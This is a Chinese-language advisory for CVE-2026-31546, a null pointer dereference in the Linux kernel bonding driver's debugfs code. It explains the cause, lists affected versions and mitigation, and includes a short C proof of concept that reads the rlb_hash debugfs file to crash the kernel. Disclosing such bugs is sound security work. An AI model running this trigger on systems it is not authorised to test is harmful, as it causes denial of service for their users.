CVE-2026-31546 CVSS 5.5 中危

CVE-2026-31546 Linux内核bonding驱动空指针解引用漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31546

漏洞类型

空指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核网络绑定驱动bonding中存在空指针解引用漏洞。在特定条件下，调试函数bond_debug_rlb_hash_show访问已被置NULL的slave指针时未进行检查，导致本地攻击者可触发内核崩溃。

技术细节

漏洞源于drivers/net/bonding/bond_debugfs.c中的bond_debug_rlb_hash_show函数。当rlb_clear_slave函数移除slave且无替代时，会保留client_info条目但将其slave指针设为NULL。该调试函数在遍历链表时直接访问client_info->slave而未判空。本地低权限用户读取/sys/kernel/debug/bonding/*/rlb_hash文件时，会触发空指针解引用，造成系统拒绝服务。

攻击链分析

STEP 1

1. 获取本地访问权限

攻击者需要在目标系统上拥有本地低权限账户。

STEP 2

2. 访问Debugfs接口

攻击者读取bonding驱动的debugfs文件（如rlb_hash）。

STEP 3

3. 触发漏洞

内核执行bond_debug_rlb_hash_show时解引用NULL指针。

STEP 4

4. 系统崩溃

触发内核Oops，导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>

/*
 * PoC for CVE-2026-31546
 * Trigger: Read the rlb_hash debugfs entry for a bonding interface.
 * Requires: Bonding interface configured and debugfs mounted.
 */
int main() {
    FILE *fp;
    // Adjust interface name (e.g., bond0) as needed
    const char *path = "/sys/kernel/debug/bonding/bond0/rlb_hash";
    char buf[256];

    fp = fopen(path, "r");
    if (!fp) {
        perror("open debugfs");
        return 1;
    }

    // Reading triggers the vulnerable show function
    while (fgets(buf, sizeof(buf), fp)) {
        printf("%s", buf);
    }

    fclose(fp);
    return 0;
}

影响范围

Linux Kernel < 6.6 (commit 017d674c)

Linux Kernel < 6.10 (commit 605b5249)

Linux Kernel < 6.1 (commit 0a3f8cd3)

防御指南

临时缓解措施

限制对debugfs文件系统的访问权限（如禁用debugfs或修改挂载选项），防止非特权用户读取相关调试文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表